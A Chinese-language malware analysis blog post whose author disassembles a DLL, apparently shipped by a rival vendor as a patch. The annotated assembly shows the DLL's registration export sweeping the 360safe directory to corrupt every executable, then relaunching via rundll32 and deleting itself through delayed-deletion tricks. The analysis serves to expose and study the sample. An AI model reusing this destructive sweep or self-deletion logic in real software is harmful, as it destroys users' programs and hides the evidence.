MJ0011原創 轉載注明哦!
=================================
注意:此文為技術分析,不帶任何偏向立場
由本文反匯編某廠商的病毒文件或曰惡意競爭文件而導致的任何法律問題,本人一概不負責
=================================
我將文中那個cab文件下載了下來,解壓得到patch34.dll(內部名稱是patch33.dll,看來升級得太快,程序員連版本信息也沒改就發布了)
使用反匯編工具IDA 5.0,發現了一些有意思的東西,現摘錄如下:
我自己加了一些注釋
; Exported entry 1. DllRegisterServer
;DLL注冊時要干下面的事
; HRESULT DllRegisterServer(void)
public DllRegisterServer
;-----------------------------------------------------------------------
; HRESULT DllRegisterServer(void)
; The COM registration export is used as the payload entry point: the
; routine does no registration work at all. It runs the destructive
; sweep, then hands the module handle to the relaunch/self-delete code.
; Out:   eax = 1 (S_FALSE), returned unconditionally - neither callee's
;        result is inspected
; Calls: sub_10001477(subdir)  - cdecl, one arg (the "pop ecx" below
;                                 discards it); corrupts every *.exe
;                                 under <ProgramFilesDir><subdir>
;        sub_10001291(hModule) - per the prose below, re-launches the
;                                 DLL via rundll32 and deletes it; body
;                                 not on this page
;-----------------------------------------------------------------------
DllRegisterServer proc near
push??? offset s_360safe ; "360safe" - path separators were lost in extraction, presumably "\360safe\"
; the only argument of the sweep: directory name appended to ProgramFilesDir
call??? sub_10001477
pop???? ecx                     ; cdecl cleanup of the single argument
push??? hModule???????? ; hModule
call??? sub_10001291
push??? 1
pop???? eax                     ; eax = 1, no matter what happened above
retn
DllRegisterServer endp
下面來看push了360safe后,sub_10001477這個子程序干了什麼
; Attributes: bp-based frame
sub_10001477 proc near
;-----------------------------------------------------------------------
; void __cdecl sub_10001477(const char *subdir)
; Enumerates <ProgramFilesDir><subdir>*.exe and passes the full path of
; every match to sub_100013F7, which (per the author, body not listed)
; rewrites the PE structure so the file no longer executes.
; In:    [ebp+arg_0] = subdir; DllRegisterServer passes the "360safe"
;        string, so the target is the 360safe install directory
; Out:   eax = leftover value of the last Win32 call; the caller ignores it
; Clobb: eax, ecx, edx, flags; esi/edi are pushed and restored
; Stack: 350h bytes of locals -
;        pvData       260 B  ProgramFilesDir value (ebp-210h)
;        FileName     260 B  search pattern, then each full path (ebp-10Ch)
;        FindFileData 320 B  = sizeof(WIN32_FIND_DATAA)     (ebp-350h)
; Observable behaviour (for detection): one read of
;        HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir,
;        a FindFirstFileA/FindNextFileA walk over *.exe in the target
;        directory, and a read/write open of each hit by sub_100013F7.
;-----------------------------------------------------------------------
FindFileData= _WIN32_FIND_DATAA?ptr -350h
pvData=?dword ptr -210h
FileName= byte ptr -10Ch
pdwType= dword ptr -8
pcbData= dword ptr -4
arg_0= dword ptr? 8
; arg_0 is the "360safe" directory name pushed by DllRegisterServer
push?ebp
mov?ebp, esp
sub?esp, 350h
; zero pvData: 1 byte here + 40h dwords + word + byte from pvData+1 = 260 B
and?byte ptr [ebp+pvData], 0
push?esi
push?edi
push?40h
pop?ecx
xor?eax, eax
lea?edi, [ebp+pvData+1]
and?[ebp+FileName],?0
rep stosd
stosw
stosb
; zero FileName the same way (first byte cleared above, 259 B from ebp-10Bh)
push?40h
xor?eax, eax
pop?ecx
lea?edi, [ebp-10Bh]
rep stosd
stosw
stosb
; SHGetValueA(HKLM, "SOFTWARE\Microsoft\Windows\CurrentVersion",
;             "ProgramFilesDir", &pdwType, pvData, &pcbData)
; esi = 103h (259) serves both as pcbData and as the snprintf size below
lea?eax, [ebp+pcbData]
mov?esi, 103h
push?eax??; pcbData
lea?eax, [ebp+pvData]
push?eax??; pvData
lea?eax, [ebp+pdwType]
push?eax??; pdwType
push?offset pszValue?; "ProgramFilesDir"
; value name to read
push?offset pszSubKey ; "SOFTWARE\Microsoft\Windows\CurrentVersion" (backslashes lost in extraction)
; subkey under HKLM
push?80000002h?; hkey = HKEY_LOCAL_MACHINE
mov?[ebp+pcbData], esi
mov?[ebp+pdwType], 1            ; preset to REG_SZ (1)
call?ds:SHGetValueA
; pvData now holds the Program Files directory path; the return value is
; not checked, so on failure the pattern is built from an empty buffer
push?[ebp+arg_0]
; FileName = snprintf("%s%s*.exe", pvData, arg_0)
; -> "<ProgramFilesDir><360safe dir>*.exe", the enumeration pattern
lea?eax, [ebp+pvData]
push?eax
push?offset s_SS_exe?; "%s%s*.exe"
lea?eax, [ebp+FileName]
push?esi??; size_t
push?eax??; char *
call?__snprintf
and?[ebp+FindFileData.dwFileAttributes], 0
; zero the rest of FindFileData: 4Fh dwords from ftCreationTime = 316 B
add?esp, 14h                    ; discard the 5 snprintf args (cdecl)
xor?eax, eax
lea?edi, [ebp+FindFileData.ftCreationTime]
push?4Fh
pop?ecx
rep stosd
lea?eax, [ebp+FindFileData]
push?eax??; lpFindFileData
lea?eax, [ebp+FileName]
push?eax??; lpFileName
call?ds:FindFirstFileA
mov?edi, eax                    ; edi = search handle, live across the loop
cmp?edi, 0FFFFFFFFh             ; INVALID_HANDLE_VALUE: nothing matched
jz?short loc_10001579           ; note: still calls FindClose on the bad handle
; loop body: one iteration per *.exe match
loc_10001531:
; FileName = snprintf("%s%s%s", pvData, arg_0, FindFileData.cFileName)
; -> full path of the current match
lea?eax, [ebp+FindFileData.cFileName]
push?eax
lea?eax, [ebp+pvData]
push?[ebp+arg_0]
push?eax
push?offset s_SSS?; "%s%s%s"
lea?eax, [ebp+FileName]
push?esi??; size_t
push?eax??; char *
call?__snprintf
lea?eax, [ebp+FileName]
push?eax??; char *
call?sub_100013F7
; sub_100013F7(path) is the destructive step. Per the author (code not
; listed for lack of time): opens the path in "r+" mode, reads the PE
; information itself, then writes back a corrupted PE structure so the
; EXE can no longer run and Windows reports it is not an executable.
add?esp, 1Ch                    ; 6 snprintf args + 1 sub_100013F7 arg
lea?eax, [ebp+FindFileData]
push?eax??; lpFindFileData
push?edi??; hFindFile
call?ds:FindNextFileA
test?eax, eax
jnz?short loc_10001531          ; another match -> process it
test?edi, edi
jz?short loc_10001580           ; presumably dead: edi is a valid handle here
loc_10001579:??; hFindFile
push?edi
call?ds:FindClose
loc_10001580:
pop?edi
pop?esi
leave
retn
sub_10001477 endp
完成對360safe的可執行程序破壞后
開始執行
push    hModule         ; hModule
call    sub_10001291
在 sub_10001291中
該dll將利用rundll32.exe將自己加載為一個進程執行
并進行自毀,自毀代碼如下:(參數為自己的dll名)
; int __cdecl sub_1000102E(LPCSTR lpExistingFileName,char)
sub_1000102E proc near
;-----------------------------------------------------------------------
; int __cdecl sub_1000102E(LPCSTR lpExistingFileName, char arg_4)
; Self-removal helper; the author notes it is called with the DLL's own
; file name after the module has re-launched itself through rundll32.
; In:    [esp+4] = path of the file to remove
;        [esp+8] = if non-zero, skip DeleteFileA entirely and behave as
;                  if it had failed with ERROR_ACCESS_DENIED
; Out:   eax = 0  file deleted immediately
;              1  neither deletion nor delayed deletion succeeded
;              2  deletion scheduled for the next reboot
; Clobb: eax, ecx, edx, flags; no callee-saved register is touched
; Cleanup note: a delayed deletion leaves an artefact until the reboot
;        actually happens - a PendingFileRenameOperations entry for the
;        MoveFileExA path, or a [rename] line in wininit.ini for the
;        sub_10001093 fallback described by the author.
;-----------------------------------------------------------------------
lpExistingFileName= dword ptr? 4
arg_4= byte ptr? 8
cmp?[esp+arg_4], 0
jnz?short loc_1000104F          ; arg_4 != 0: go straight to the retry logic
push?[esp+lpExistingFileName] ; lpFileName
call?ds:DeleteFileA
; plain delete first: success returns 0, failure fetches the error code
; and falls through to loc_10001052
cmp?eax, 1
jnz?short loc_10001047
xor?eax, eax
retn
loc_10001047:
call?ds:GetLastError            ; eax = reason DeleteFileA failed
jmp?short loc_10001052
loc_1000104F:
push?5                          ; synthesise ERROR_ACCESS_DENIED (5)
pop?eax
loc_10001052:
; only "file is locked/in use" failures are retried with delayed
; deletion; every other error code returns 1
cmp?eax, 5                      ; ERROR_ACCESS_DENIED
jz?short loc_10001060
cmp?eax, 20h                    ; ERROR_SHARING_VIOLATION
jz?short loc_10001060
push?1
jmp?short loc_10001079
; MoveFileExA(name, NULL, MOVEFILE_DELAY_UNTIL_REBOOT): the Win32 way to
; remove a file that is still in use - it is deleted at the next boot.
loc_10001060:
call?sub_10001000               ; gate for the MoveFileExA path; body not shown - presumably a platform check, verify
test?eax, eax
jz?short loc_1000107B
push?4??; dwFlags = MOVEFILE_DELAY_UNTIL_REBOOT
push?0??; lpNewFileName = NULL -> delete instead of rename
push?[esp+8+lpExistingFileName] ; lpExistingFileName
call?ds:MoveFileExA
push?2                          ; MoveFileExA's result is not checked
loc_10001079:
pop?eax
retn
loc_1000107B:
; fallback when sub_10001000 returns 0: sub_10001093(name, 0). Per the
; author this writes the file into the [rename] section of wininit.ini
; so it is removed automatically on the next reboot.
push?0
push?[esp+4+lpExistingFileName]
call?sub_10001093
pop?ecx
pop?ecx                         ; discard the two cdecl args
xor?ecx, ecx
test?eax, eax
setnz?cl
inc?ecx                         ; eax = (sub_10001093 != 0) ? 2 : 1
mov?eax, ecx
retn
sub_1000102E endp
綜上,這個dll做的事主要就是干掉360SAFE的所有可執行文件,然后自毀
呵呵,真是殺人不留痕呀
MJ0011原創 轉載注明哦